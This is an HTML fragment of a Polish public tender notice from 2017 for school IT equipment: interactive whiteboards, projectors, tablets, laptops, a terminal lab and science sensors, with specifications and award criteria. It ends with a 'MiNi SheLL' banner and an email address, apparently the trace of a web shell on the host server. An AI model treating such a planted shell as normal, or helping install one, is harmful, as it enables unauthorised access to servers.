                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.  	Zmiany umowy muszą być zgodne z art. 144 ustawy prawo zamówień publicznych, następują za zgodą obu stron i wymagają formy pisemnej pod rygorem nieważności. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie. 
2. 	Zakazane są zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, z wyjątkiem zmian o których mowa w ust. 3.
3.  Zmiany w umowie mogą dotyczyć:
1) 	terminu wykonania zamówienia,
2)  wysokości wynagrodzenia Wykonawcy,
3)  sprzętu komputerowego / pomocy naukowych objętych dostawą.
4.  Zmiana terminu wykonania zamówienia może nastąpić w przypadku:
1) 	przerwy w realizacji zamówienia na skutek działań podmiotów trzecich i z przyczyn niezawinionych przez Wykonawcę,
2)	konieczności wykonania prac dodatkowych, które będą niezbędne dla  prawidłowej realizacji przedmiotu zamówienia, a których nie można było przewidzieć na etapie składania oferty (dotyczy pracowni terminalowej),
3) konieczności przesunięcia terminu realizacji zamówienia, jeżeli konieczność ta nastąpiła na skutek okoliczności, których nie można było przewidzieć w chwili zawarcia umowy i nie wynikają one z przyczyn leżących po stronie Wykonawcy 
4)  rezygnacji z realizacji części zamówienia.
5. 	Zmiana wysokości wynagrodzenia Wykonawcy może nastąpić w przypadku: 
     1) 	zmiany ustawowej stawki podatku VAT,
    	2) 	odstąpienia (rezygnacji) od części zamówienia,
	3) 	zmiany cen sprzętu komputerowego / pomocy naukowych, jeżeli zmiana ta będzie korzystna dla Zamawiającego (obniżenie ceny sprzętu komputerowego / pomocy naukowych po dacie zawarcia umowy z Wykonawcą).
6. 	Poza przypadkami określonymi w poprzedzających paragrafach umowy i ust. 3, zmiany umowy mogą wystąpić w następujących przypadkach:
1) 	zakończenia serii produkcyjnej danego sprzętu komputerowego / pomocy naukowych oraz rozpoczęcia produkcji sprzętu komputerowego / pomocy naukowych o parametrach technicznych takich samych lub lepszych od opisanych przez Zamawiającego w specyfikacji istotnych warunków zamówienia, zmiany  / aktualizacji rozwiązań ze względu na postęp technologiczny lub zmiany obowiązujących przepisów, poprawy jakości, wydajności, bezpieczeństwa  lub innych charakterystycznych parametrów sprzętu komputerowego / pomocy naukowych,  
2) 	wydłużenia okresu gwarancji przez producenta lub Wykonawcę
3) 	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron umowy,
4) 	powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w niniejszej umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie niniejszej umowy w celu jednoznacznej interpretacji zapisów przez strony umowy,
5) 	wystąpienia przyczyn  niezależnych od stron umowy, które będą skutkowały koniecznością zastosowania innych rozwiązań, 
6)  zmiany podmiotu realizującego usługę serwisową,
7) wystąpią środki ochrony prawnej w postępowaniu o zamówienie publiczne uniemożliwiające wykonanie zamówienia w terminie wskazanym w postępowaniu.  
7.	Warunki dokonywania zmian:
1)  inicjowanie zmian na pisemny wniosek Wykonawcy lub Zamawiającego,
2)	uzasadnienie konieczności i wpływu zmian na realizację zamówienia,
3)  w formie pisemnego aneksu do umowy.
8.	Zmiany zapisów umowy, które nie odnoszą się do treści oferty nie wymagają pisemnego aneksu pod rygorem nieważności. Za zmiany takie uważa się np.:
  1) zmianę koordynatora za strony Zamawiającego / Wykonawcy,
  2) zmiany adresowe.
9.	Strony zobowiązane są do powiadomienia na piśmie o zmianach o których mowa w ust. 8.  
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 10/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Zamawiający zastrzega możliwość unieważnienia postępowania w przypadkach odnoszących się do finansowania niniejszego zamówienia, w szczególności  na podstawie art. 93 ust. 1a ustawy PZP oraz na podstawie art. 93 ust. 4 ustawy PZP, w sytuacji, gdy cena jednostkowa laptopa z oprogramowaniem przekroczy 3.000,00 PLN, a tablicy interaktywnej 4.000,00 PLN. Powyższe wynika z Regulaminu konkursu dotyczącego naboru wniosków o dofinansowanie projektów w zakresie Poddziałania : 03.02.01 Jakość Edukacji Ogólnej, w ramach którego zamawiający uzyskał dofinansowanie w/w projektu.</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Część 1  dostawa tablic interaktywnych  18 szt., projektorów multimedialnych  18 szt. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa tablic interaktywnych  18 szt., projektorów multimedialnych  18 szt. 
Wymagania:
1. Tablica interaktywna z oprogramowaniem:
1) przekątna - minimum 77 cali,
2) format 4/3,
3) technologia - dotykowa, optyczna,
4) waga - max 18,5 kg,
5) gwarancja producenta na tablicę - 24 miesiące.
2.Projektor multimedialny krótkoogniskowy z uchwytem i akcesoriami:
1) jasność od 2000 do 3000 ANSI lumenów,
2) kontrast min 2000:1,
3) ultra krótka ogniskowa - obraz o przekątnej 80" wyświetlany jest przy odległości nie większej niż 100 cm,
4) żywotność lampy min 5000 godzin w trybie pełnej jasności,
5) gwarancja na projektor - 36 miesięcy,
6) gwarancja na lampę - 36 miesięcy.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>32322000-6, 32321200-1,
                    38652100-1,
                    38653400-1,
                    48000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 15<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Jasność projektora </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin realizacji - do 15 dni licząc od daty zawarcia umowy.<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Część 2  dostawa tabletów  44 szt., komputerów przenośnych (laptopów)  43 szt.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa tabletów  44 szt., komputerów przenośnych (laptopów)  43 szt.
Wymagania:
1. Tablet:
1) rozmiar - min 7,0 cali, max 7,5 cala,
2) pamięć operacyjna wbudowana - min 1 GB RAM,
3) rozdzielczość min 1024 x 600,
4) bateria - min pojemność 3450 mAh, 
5) możliwość pracy urządzenia na baterii - do 10 godz.,
6) gwarancja producenta - min 24 miesiące.
2. Komputer przenośny (laptop) z oprogramowaniem:
1) ekran - TFT min 13,5 max 14,5 cali LED HD o rozdzielczości 1366 x 768, z powłoką matową,
2) procesor uzyskujący wynik co najmniej 2200 punktów w teście PassMark - CPU Mark wg wyników procesorów publikowanych na stronie http://cpubenchmark.net/cpu_list.php (od momentu ogłoszenia postępowania do dnia składania ofert),
3) karta graficzna - zintegrowana z płytą główną lub procesorem, osiągająca w teście wydajności PassMark - Video Card Benchmarks wynik min 600 punktów wg wyników publikowanych  na  stronie  http://videocardbenchmark.net/gpu_list.php (od momentu ogłoszenia postępowania do dnia składania ofert),
4) gwarancja producenta komputera - min 36 miesięcy door to door,
5) gwarancja producenta na baterie  min 12 miesięcy,
6) oprogramowanie, w tym: system operacyjny, pakiet biurowy, do zarządzana mobilną pracownią komputerową.   
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30213200-7, 30213100-6,
                    48000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 15<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Wydajność procesora</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin realizacji - do 15 dni licząc od daty zawarcia umowy.<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Część 3 	dostawa wraz z montażem i rozmieszczeniem pracowni terminalowej  1 kpl., dostawa szafy do ładowania tabletów -  1 szt., dostawa  urządzeń pomiarowych  5 kpl.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa wraz z montażem i rozmieszczeniem pracowni terminalowej  1 kpl., dostawa szafy do ładowania tabletów -  1 szt., dostawa  urządzeń pomiarowych  5 kpl.
Wymagania:
1. Szafa na tablety:
1) ilość półek - 30 szt.,
2) wysokość nie większa niż 1250 mm,
3) głębokość nie większa niż 500 mm,
4) szerokość nie większa niż 1350 mm,
5) długość kabla zasilającego - 3 m.
2. Pracownia terminalowa na 15 stanowisk uczniowskich oraz stanowisko nauczyciela:
1) urządzenia dostępowe typu terminalowego
a) gwarancja - 36 miesięcy,
2) monitory
a) przekątna ekranu - 18,5 cala,
b) rozdzielczość 1366 x 768,
c) gwarancja - 24 miesiące,
3) serwer
a) procesor: min 10000 punktów  w teście PassMark High End CPUs  publikowanym na stronie http://cpubenchmark.net/cpu_list.php (od momentu ogłoszenia postępowania do dnia składania ofert), 
b) gwarancja - 36 miesięcy,
4) urządzenie UPS
a) moc rzeczywista - 720W,
b) pojemność - 7,2 Ah,
c) gwarancja - 24 miesiące
5) stanowisko nauczycielskie 
a) procesor:  min 3500 punktów w teście PassMark High End CPUs  publikowanym na stronie http://cpubenchmark.net/cpu_list.php (od momentu ogłoszenia postępowania do dnia składania ofert),
b) gwarancja - wieczysta,
6) UTM
a) gwarancja - 12 miesięcy,
b) subskrypcje na wszystkie moduły - nie krótszy niż 36 miesięcy,
3. urządzenia pomiarowe:
- Czujnik chemiczny,
- Optyczny czujnik tlenu rozpuszczonego,
- Czujnik zasolenia,
- Czujnik etanolu,
- Czujnik stężenia dwutlenku węgla,
- Ręczny czujnik pracy serca/tętna,
- Czujnik EKG,
- Pojemnik do fotosyntezy,
- Czujnik tętna wysiłkowego,
- Zaawansowany czujnik pomiaru jakości wody,
- Czujnik pogodowy i prędkości wiatru,
- Czujnik siły,
- Czujnik ruchu,
- Czujnik napięcia,
- Czujnik natężenia,
- Tor  równia pochyła wraz z wózkami i akcesoriami. (1,2 m),
- Czujnik pola magnetycznego,
- Czujnik natężenia światła,
- Czujnik Temperatury / Światła / Dźwięku,
- Interfejs podwójny do pracowni pomiarowej z adapterem BT 4.0,
- Interfejs pojedynczy do pracowni pomiarowej z adapterem BT 4.0,
- Oprogramowanie;
a) gwarancja producenta - 60 miesięcy.







<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30231100-8, 48822000-6,
                    30231300-0,
                    30237200-1,
                    38400000-9,
                    48000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin realizacji - do 24 dni licząc od daty zawarcia umowy (termin maksymalny. Termin zostanie ustalony w wyniku postępowania na podstawie złożonej przez wykonawcę oferty.<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com